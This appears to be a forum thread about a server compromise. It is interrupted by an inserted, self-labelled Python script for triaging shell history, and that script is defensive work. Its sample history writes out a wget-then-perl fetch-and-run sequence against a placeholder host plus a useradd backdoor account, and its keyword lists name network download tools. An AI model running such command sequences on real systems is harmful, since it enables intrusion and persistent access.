Server hacked by iskorpitx

iskorpitx left a trail

For anyone else this guy may have hit:

I found the script that was used to wreak the havoc on my server. The evidence in my case was located in /.bash_history, /etc/udev/pr.txt and /etc/udev/i.txt.

The history file shows the attacker downloaded the txt files from ddmalfa.cz and ran them. He also added a user named "help" before causing the system to crash.
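The pattern reported in the post above (files fetched from a remote host, then run, then a new account added) can be searched for in a shell history file. This is an added example, not part of the original post; the downloader, interpreter and account tool names are assumptions, since the post does not say which commands were used, and the sample history is constructed.

```python
import re
import shlex

# Assumed tool names; the post does not say which commands were used.
DOWNLOADERS = {"wget", "curl", "fetch", "lwp-download"}
INTERPRETERS = {"perl", "sh", "bash", "python", "php"}
ACCOUNT_TOOLS = {"useradd", "adduser"}

def triage_history(history_text):
    """Return (line_no, kind, detail) findings from shell history text."""
    findings = []
    downloaded = {}  # basename of fetched file -> history line number
    for no, raw in enumerate(history_text.splitlines(), 1):
        # One history line can chain several commands with ; && || |
        for cmd in re.split(r"\s*(?:;|&&|\|\|?)\s*", raw.strip()):
            try:
                argv = shlex.split(cmd)
            except ValueError:  # unbalanced quotes: fall back to whitespace
                argv = cmd.split()
            if not argv:
                continue
            tool = argv[0].rsplit("/", 1)[-1]
            if tool in DOWNLOADERS:
                for arg in argv[1:]:
                    if re.match(r"(?:https?|ftp)://", arg):
                        downloaded[arg.rstrip("/").rsplit("/", 1)[-1]] = no
                        findings.append((no, "download", arg))
            elif tool in INTERPRETERS:
                # Flag only files that an earlier history line fetched.
                for arg in argv[1:]:
                    if arg.rsplit("/", 1)[-1] in downloaded:
                        findings.append((no, "ran-downloaded-file", arg))
            elif tool in ACCOUNT_TOOLS:
                names = [a for a in argv[1:] if not a.startswith("-")]
                findings.append((no, "account-added", names[-1] if names else "?"))
    return findings

# Constructed sample, modelled on the post; the host is a placeholder.
SAMPLE_HISTORY = """\
cd /etc/udev
wget http://example.invalid/pr.txt
wget http://example.invalid/i.txt
perl pr.txt
perl /etc/udev/i.txt
useradd help
"""

if __name__ == "__main__":
    for finding in triage_history(SAMPLE_HISTORY):
        print(finding)
```

History files are attacker-writable, so an empty result does not clear a host; compare against account files and file timestamps as well.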
 


If you are running suPHP and a hacker uploaded a Perl script, will the script run as the user or not?
 
Very interesting.

Can you also post the method of how he got the files on the box? And the question is indeed, how can you run the script as root.
 